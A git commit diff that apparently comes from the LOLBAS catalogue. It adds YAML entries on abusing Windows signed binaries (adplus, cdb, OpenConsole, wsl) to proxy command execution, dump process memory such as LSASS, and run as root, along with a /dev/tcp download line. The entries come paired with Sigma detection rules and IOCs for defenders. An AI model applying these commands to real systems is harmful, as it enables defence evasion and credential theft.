Adding and updating various LOLBINS (#229)

Co-authored-by: Wietze <wietze@users.noreply.github.com>
This commit is contained in:
Nasreddine Bencherchali
2022-11-11 17:42:44 +01:00
committed by GitHub
parent 1587eeaf6c
commit 0d7efb8ead
8 changed files with 150 additions and 10 deletions

View File

@@ -11,15 +11,41 @@ Commands:
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -c config-adplus.xml
Description: Execute arbitrary commands using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: All Windows
- Command: adplus.exe -c config-adplus.xml
Description: Dump process memory using adplus config file (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Dump
Privileges: SYSTEM
MitreID: T1003.001
OperatingSystem: All Windows
- Command: adplus.exe -crash -o "C:\temp\" -sc calc.exe
Description: Execute arbitrary commands and binaries from the context of adplus. Note that providing an output directory via '-o' is required.
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: All windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\adplus.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\adplus.exe
Code_Sample:
- Code:
- Code: https://gist.github.com/nasbench/e34ca2cd90e3a845a558a102a4f607da
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml
- IOC: As a Windows SDK binary, execution on a system may be suspicious
Resources:
- Link: https://blog.thecybersecuritytutor.com/adplus-debugging-tool-lsass-dump/
- Link: https://twitter.com/nas_bench/status/1534916659676422152
- Link: https://twitter.com/nas_bench/status/1534915321856917506
Acknowledgement:
- Person: mr.d0x
Handle: '@mrd0x'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'

View File

@@ -14,17 +14,24 @@ Commands:
- Command: |
cdb.exe -pd -pn <process_name>
.shell <cmd>
Description: Attaching to any process and executing shell commands
Description: Attaching to any process and executing shell commands.
Usecase: Run a shell command under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
- Command: cdb.exe -c C:\debug-script.txt calc
Description: Execute arbitrary commands and binaries using a debugging script (see Resources section for a sample file).
Usecase: Run commands under a trusted Microsoft signed binary
Category: Execute
Privileges: User
MitreID: T1127
OperatingSystem: Windows
Full_Path:
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
- Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
Code_Sample:
- Code:
- Code: https://gist.github.com/nasbench/d9c15864f1e21bdd8b7cf55997b45f4b
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_cdb.yml
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
@@ -35,6 +42,7 @@ Resources:
- Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
- Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
- Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/
- Link: https://twitter.com/nas_bench/status/1534957360032120833
Acknowledgement:
- Person: Matt Graeber
Handle: '@mattifestation'
@@ -42,3 +50,5 @@ Acknowledgement:
Handle: '@mrd0x'
- Person: Spooky Sec
Handle: '@sec_spooky'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'

View File

@@ -0,0 +1,25 @@
---
Name: OpenConsole.exe
Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Created: 2022-06-17
Commands:
- Command: "OpenConsole.exe calc"
Description: Execute calc with OpenConsole.exe as parent process
Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
Detection:
- IOC: OpenConsole.exe spawning unexpected processes
- Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml
Resources:
- Link: https://twitter.com/nas_bench/status/1537563834478645252
Acknowledgement:
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'

View File

@@ -25,6 +25,13 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 19 Server
- Command: wsl.exe --system calc.exe
Description: Execute the command as root
Usecase: Performs execution of arbitrary Linux commands as root without need for password.
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 11
- Command: wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
Description: Downloads file from 192.168.1.10
Usecase: Download file
@@ -37,11 +44,12 @@ Full_Path:
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_wsl_lolbin.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/2a4e6d8ebeb07d294e6d16a083361bd7e53df7b3/rules/windows/process_creation/proc_creation_win_lolbin_susp_wsl.yml
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- IOC: Child process from wsl.exe
Resources:
- Link: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
- Link: https://twitter.com/nas_bench/status/1535431474429808642
Acknowledgement:
- Person: Alex Ionescu
Handle: '@aionescu'
@@ -49,3 +57,5 @@ Acknowledgement:
Handle: '@NotoriousRebel1'
- Person: Asif Matadar
Handle: '@d1r4c'
- Person: Nasreddine Bencherchali
Handle: '@nas_bench'